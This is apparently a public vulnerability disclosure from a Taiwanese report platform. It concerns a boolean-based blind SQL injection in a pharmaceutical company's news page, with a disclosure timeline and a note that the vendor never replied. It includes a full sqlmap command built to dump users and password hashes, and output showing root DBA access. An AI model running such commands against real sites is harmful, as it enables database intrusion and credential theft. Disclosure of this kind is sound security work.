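2015-12-03: Details reported to the vendor; awaiting vendor handling
2015-12-07: Vendor confirmed; details disclosed to the vendor only
2015-12-17: Details disclosed to core white hats and experts in related fields
2015-12-27: Details disclosed to regular white hats
2016-01-06: Details disclosed to intern white hats
2016-01-21: Details disclosed to the public
五洲製藥 follows the principle of "work with conscience, make medicine ethically": first make sure the product does no harm to the body, so drug safety comes first; only then pursue results, that is, drug efficacy.
URL: http://**.**.**.**/news_detail.php?id=14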
$ python sqlmap.py -u "http://**.**.**.**/news_detail.php?id=14" -p id --technique=B --random-agent --batch --no-cast --current-user --is-dba --users --passwords --count --search -C pass --output-dir=output
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=14 AND 2442=2442
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.4.31
back-end DBMS: MySQL >= 5.0.0
current user: 'root@localhost'
current user is DBA: True
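Deploy a WAF.
Severity: High
Vulnerability Rank: 18
Confirmed: 2015-12-07 01:02
Thank you for the report.
2016-02-20: After receiving the report, HITCON emailed the service mailbox listed on the website several times; as of public disclosure there has been no response.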